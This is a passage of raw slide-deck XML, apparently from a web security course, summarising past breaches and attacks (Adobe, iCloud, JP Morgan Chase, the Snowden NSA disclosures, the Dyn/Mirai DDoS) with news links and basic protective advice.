            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>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457200" y="152400"/>
            <a:ext cx="8229600" cy="609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Account Breaches (cont..)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14234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839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424C8B8-4D13-4830-8FBA-BD81D9AF6891}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83972" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="762000"/>
            <a:ext cx="8229600" cy="5594350"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Bookman Old Style" panose="02050604050505020204" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod" startAt="5"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Adobe Security Breach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>In October 2013, 150 million account credentials were exposed by Adobe, leading to secondary breaches all over the Internet. More than 150 million user IDs with hashed (encrypted) passwords were stolen, including at least 38 million active users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Attackers with the Adobe list compromised other web applications, stealing user identities, and even credit information. In fact, major sites like Facebook saw the risk and advised their users to update their passwords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>To protect against this type of attack, passwords should not be re-used across sites.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1400">
              <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>See</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1400">
              <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>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r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.zdnet.com/find-out-if-your-data-was-leaked-in-the-adobe-hack-7000023065/</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r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://blogs.adobe.com/conversations/2013/10/important-customer-security-announcement.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Bookman Old Style" panose="02050604050505020204" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod" startAt="5"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>iCloud Celebrity Photos Breach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>In September 2014, hundreds of celebrity accounts were compromised by a very targeted attack on user names, passwords and security questions. Photos of celebrities were downloaded and posted online. To protect against this type of attack, Apple advised all users to always use a strong password and enable two-step verification. Apple changed iCloud login as follows: anytime someone logs in to iCloud from a new machine/browser, an email is sent to the account holder. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>See</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1400">
              <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>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r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.apple.com/pr/library/2014/09/02Apple-Media-Advisory.html</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hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://www.cbsnews.com/news/apple-patches-icloud-security-gap-after-celebrity-photo-hacks-reports-say/</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algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>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altLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Account Breaches (cont..)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142340" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="6356350"/>
            <a:ext cx="4346575"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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="849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D4C11F5-D7EA-45FE-B658-411332DBCF65}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84996" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="4937125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Bookman Old Style" panose="02050604050505020204" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Massive JP Morgan Chase Hack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>In November 2015, 4 men were indicted on charges they hacked into multiple financial institutions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Hackers operated a stock-pumping scheme and online gambling operations that netted them more that 100 million dollars.  The operation ran from 2012 to 2015.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>The FBI says defendants hacked into JP Morgan Chase and obtained access to 80 million customer accounts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Charges include unauthorized access of computers, identity theft, securities and wire fraud and money laundering.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>In addition to breaching JP Morgan Chase, they are charged with hacking into six other financial institutions, as well as financial news sites, online stock brokers and even software companies, including Dow Jones, Scottrade and ETrade.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>An unidentified hacker used multiple methods to break into the networks, including brute-force attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>To hide their activities they set up dozens of shell companies and used fake passports and other fraudulent credentials to maintain false identities. </a:t>
            </a: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rPr>
              <a:t>See </a:t>
            </a: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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.wired.com/2015/11/four-indicted-in-massive-jp-morgan-chase-hack/</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a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://money.cnn.com/2015/11/10/technology/jpmorgan-hack-charges/</a:t>
            </a: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a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
              <a:cs typeface="Geneva" pitchFamily="3"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altLang="en-US" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>The NSA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142340" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="6356350"/>
            <a:ext cx="4346575"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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="860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D6E79D5-C691-4B38-9998-4831056B70BD}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86020" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="4937125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Bookman Old Style" panose="02050604050505020204" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod" startAt="8"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Edward Snowden disclosures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>In June 2013, Edward Snowden decided he wanted to start a debate about mass surveillance by the US National Security Agency (NSA).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>We are still witnessing the release of the material he took with him while he was a contractor working for the NSA.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Among the tools used by the NSA for mass surveillance are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Cable-intercept programs monitoring traffic flowing into and across the US (BLARNEY, FAIRVIEW, OAKSTAR and STORMBREW,  a.k.a. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" b="1" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Upstream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> collection).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Data collect programs for data from Google, Facebook,  Apple, Yahoo and other US internet giants (PRISM, a.k.a. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" b="1" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Downstream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> collection).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>The Snowden documents reveal that the NSA has successfully broken or circumvented much of online encryption, including TLS/SSL, HTTPS, SSH, VPNs (Project BULLRUN).</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See </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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.theguardian.com/world/the-nsa-files</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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.eff.org/nsa-spying/how-it-works</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altLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Distributed Denial-of-Service (DDoS) Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142340"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Viswanathan Ellis Horowitz Marco Papa</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="870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DF9F379-E938-4E10-959A-61200DB23ED6}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87044" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1173163"/>
            <a:ext cx="8229600" cy="4937125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Bookman Old Style" panose="02050604050505020204" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod" startAt="9"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Dyn</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>On October 21, 2016, New Hampshire-based </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Dyn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> said its server infrastructure suffered a distributed denial-of-service (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>) attack, which occurs when a system is overwhelmed by malicious electronic traffic. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>The scale of the attack led to suspicions that it might be state sponsored, but ZDNet security editor Zack Whittaker said the evidence is not yet clear. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>The attack on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Dyn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> DNS was powered in part by a botnet of hacked DVRs and webcams known as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Mirai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>. The source code for the malware that controls this botnet was put on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a: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algn="ctr"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Source: downdetector.com</a:t>
            </a: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rPr>
              <a:t>See </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.cbsnews.com/news/internet-disrupted-dyn-hit-by-ddos-cyberattack/</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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.digitalattackmap.com/understanding-ddos/</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r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/newsapps/beeswithmachineguns</a:t>
            </a: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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="87045"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178175"/>
            <a:ext cx="372427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sz="2900">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>How does </a:t>
            </a:r>
            <a:r>
